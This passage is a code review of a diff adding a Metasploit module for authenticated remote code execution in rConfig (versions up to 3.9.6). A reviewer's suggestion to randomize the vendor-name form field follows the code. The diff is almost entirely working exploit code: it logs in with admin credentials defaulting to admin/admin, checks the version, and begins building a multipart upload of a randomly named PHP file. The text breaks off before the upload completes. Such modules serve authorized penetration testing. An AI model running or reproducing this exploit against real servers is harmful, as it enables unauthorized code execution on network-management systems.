modules/exploits/linux/http/rconfig_authenticated_rce.rb

```diff
@@ -0,0 +1,164 @@
+            ['EDB', '49783']
+          ],
+        'Platform' => [ 'php' ],
+        'Arch' => ARCH_PHP,
+        'Privileged' => true,
+        'DisclosureDate' => '2021-03-17',
+        'Targets' =>
+        [
+          [ 'Linux', {}]
+        ],
+        'Notes' =>
+          {
+            'Stability' => [ CRASH_SAFE ],
+            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
+            'Reliability' => [ REPEATABLE_SESSION ]
+          },
+        'DefaultOptions' => {
+          'SSL' => true,
+          'RPORT' => 443
+        }
+      )
+    )
+
+    register_options [
+      OptString.new('USERNAME', [true, 'Username of the admin account', 'admin']),
+      OptString.new('PASSWORD', [true, 'Password of the admin account', 'admin']),
+      OptString.new('TARGETURI', [true, 'The base path of the rConfig server', '/'])
+    ]
+  end
+
+  def authenticate
+    r = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/login.php')
+    })
+
+    fail_with Failure::Unreachable "Target #{RHOST} could not be reached." unless r
+    cookie = r.get_cookies
+
+    r = send_request_cgi!(
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, '/lib/crud/userprocess.php'),
+      'headers' => {
+        'Origin' => full_uri(''),
+        'Referer' => "#{full_uri}/login.php"
+      },
+      'cookie' => cookie,
+      'vars_post' => {
+        'user' => datastore['USERNAME'],
+        'pass' => datastore['PASSWORD'],
+        'sublogin' => '1'
+      }
+    )
+
+    fail_with Failure::Unreachable "Target #{RHOST} could not be reached." unless r
+
+    if r.body.to_s.include?('Invalid')
+      fail_with Failure::BadConfig, 'The admin credentials given are incorrect'
+    end
+
+    if r.headers.include?('location')
+      print_good 'We successfully logged in !'
+    else
+      fail_with Failure::UnexpectedReply, 'Unexpected reply as auth redirection didn\'t work'
+    end
+
+    cookie
+  end
+
+  def check
+    r = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/login.php')
+    })
+
+    if r&.code == 200
+
+      version = r.body.to_s.match(/Version (\d*).(\d*).(\d*)/)
+
+      if version
+
+        print_good(version[0] + ' of rConfig found !')
+
+        if version[1].to_i < 3 || (version[1].to_i == 3 && version[2].to_i < 9) || (version[1].to_i == 3 && version[2].to_i == 9 && version[3].to_i <= 6)
+          CheckCode::Vulnerable
+        else
+          CheckCode::Safe('Only versions <= 3.9.6 are vulnerable !')
+        end
+      else
+        CheckCode::Unknown('Version of rConfig not found !')
+      end
+    else
+      CheckCode::Unknown("Can't access the rConfig web interface !")
+    end
+  end
+
+  def exploit
+    cookie = authenticate
+    filename = Rex::Text.rand_text_alpha_lower(5) + '.php'
+
+    post_data = Rex::MIME::Message.new
+    post_data.add_part('thisisrce', nil, nil, 'form-data; name="vendorName"')
```

Comment:
Let's randomize the vendor name:

```suggestion
    post_data.add_part(Faker::Company.name, nil, nil, 'form-data; name="vendorName"')
```